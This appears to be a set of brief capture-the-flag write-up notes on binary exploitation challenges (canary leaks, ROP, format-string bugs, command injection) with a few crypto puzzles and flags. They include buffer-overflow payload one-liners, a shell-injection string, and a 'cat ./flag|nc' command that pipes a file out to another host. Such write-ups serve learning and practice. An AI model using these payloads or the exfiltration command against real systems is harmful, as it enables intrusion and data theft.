parksjin01

babypwn

• program is small and simple. Just normal stackoverflow problem, and we can get canary by memory leak.
• It's server program so get user input by recv() function and this function add 0x0a at the end of user input.
• So if we type just 40bytes of letter than we can get canary. canary's last byte is overwritten with 0x0a but it doesn't matter
• Most of cases, canary's last byte is just \x00 so we can just guess last is \x00
• Next protection is NX, we can bypass NX by ROP and Return to libc method.
• I make [simple python script] which do ls -al command. But there are critical error in script.
• I have to send the result to client side and I need to do it by redirection of IO. But I can't find how to call function in libc many times with rop chain in x86 program.
• I solve this problem, I have question about rop chain yet but I solved it with linux command.
• I use cat ./flag|nc 192.168.0.3 instead of ls -al and I solved it. But I can't understand why other people's writeup doesn'

parksjin01

pwn1

• pwn1 is really basic problem about buffer overflow.
• When we excute program, they just print buffer address to us to calculate address easier.
• Buffer size is only 0x10 so I'll write shellcode after ret
• This simple python script will help you to pwning it.

third

• This problem is not hard too. Only difficulty is that I couldn't see library function name.
• I make my own function table too make reversing more easily

parksjin01

baby

• This is simple server program, and we should make user named baby.
• If you exec program and connect with nc you can see 3 options (We have time limit to use, In one session we can only use 15 seconds)
• First we can do stack overflow, Second we can do fsb and last we can do heap overflow.
• I couldn't find the usage of heap overflow but I found usage of others.
• This program's NX bit is enabled so we have to leak memory to do some stack overflow.
• With %20p*144 and last hex number is the canary.
• Canary doesn't change after server is turned on. That means we can check canary first and then do stackoverflow next. (Actually if you use automatic script with python, you can do these things at once, but if you do this with your hands you have time limit so you have to try many times. I recommand automatic code)
• In stack overflow function memory looks like this
• [canary(8byte)][buffer(1032byte)][socket_fd(8byte)]

parksjin01

Goodluck

• There are fsb in program and we can print flag by it
• If we wrote %p%p%p%p%p%p%p%p%p%p%p%p%p as input and then 10th value to 13th value is flag
• flag: flag{always_give_110%}

snekquiz

• If we correct all problem we can only get 3 points and we have to get extactly 5 points to get flag
• We have to change score variable by buffer overflow.
• memory payload is like this(input buffer -> 80bytes, score variable -> 4bytes, canary -> 4bytes)
• We can make point 5 by this script (python -c 'print "a"*80+"\x05"+"\x00"*4';cat)

parksjin01

char

• First we can overflow and control eip if out input is longer than 32 letters.
• Second we can only type printable letters(0x20~0x7f) and we have to make shellcode with these letters.
• Finally NX bit is enabled so we can run shellcode in buffer. It means we have to use rop programming to get shell
• It's 32 bit program so function call isn't fastcall but if we want to do rop program we have to use fastcall function.
  execve function use fastcall method even if program is x86 bit. Now what we have to do is make sure edi, esi, edx has proper argument
  for calling execve
• #Not finished yet

EasiestPrintf

parksjin01

ebp

• To solve this program, we need to know and use format string bug.
• To explain more easliy I'll suppose aslr is turned off

• 0xffffd600:	0xf7fe76db	0x00000000	0xffffd628	0x0804852c
  0xffffd610:	0xffffd648	0xf7fedee0	0xf7e6662b	0x00000000
  0xffffd620:	0xf7fb9000	0xf7fb9000	0xffffd62c	0x0804a480
  0xffffd630:	0x0804a080	0x00000400	0xf7fb95a0	0x00000000
  0xffffd640:	0xf7fb9000	0xf7fb9000	0x00000000	0xf7e21637
  

0xffffd650: 0x00000001 0xffffd6e4 0xffffd6ec 0x00000000

parksjin01

Unix Time Formatter

• First we have to know we can use multi env, In binary they check debug bit and result is differ with that flag
• Also when we try to quit program with option 5, free function is occured first and then ask user to quit really, we can occur
  DFB(Double Free Bug) to get flag.
• At last when this program calculates number to unix time, this program use /bin/date -d @time format time and format is user input.
• If we can input ';/bin/bash #\ at format place we can get shell, however we can only input %aAbBcCdDeFgGhHIjklmNnNpPrRsStTuUVwWxXyYzZ:-_/0^#
  these characters so we can't input it directly. We have to use DFB here.

• Format: %c
  strdup(0x7fffaec863f8) = 0x251d420

parksjin01

pwn1

• It's really easy and simple buffer overflow problem.
• Just input 27 dumy letters and input \x1e\xab\x11\xca
• Payload: (python -c 'print "aaaaaaaaaaaaaaaaaaaaaaaaaaa"+"\x1e\xab\x11\xca"';cat)
• flag: gigem{T00_435Y}
• bin is at here

pwn2

• Also, it's really easy and simple buffer overflow problem.
• Input 0x8c dummy letters and input address of print_flag function(0x08048548)

parksjin01

warmup

• First this program is stripped so we have to find ep with readelf funtion. EP of main function is 0x40061d
• Payload: [buffer]*64 + rbp + ret
• To bypass ASLR we have to know start address of easy function and it's provided
• Actual payload looks like this 'a'*72+'\x0d\x06\x40\x00'+'\x00'*4
• It's python code is at here

tutorial

• This program also need to find ep, and ep of main function is 0x401087
• To execute this program in local you have to make user which name is tutorial and you have to execute this program with admin permission

parksjin01

caesar

• As you can see in prob title, it's caesar encryption prob.
• Use web tool to decrypt it.
• flag: ukppnrwryeavgtwicfmnrkbnzeqawg

The Valley of Fear

• Like hdd sector seek, first number in () is paragraph, sencond number is line in paragraph, third is word in sentence
• flag: the flag, is Ceremonial plates.

Substitution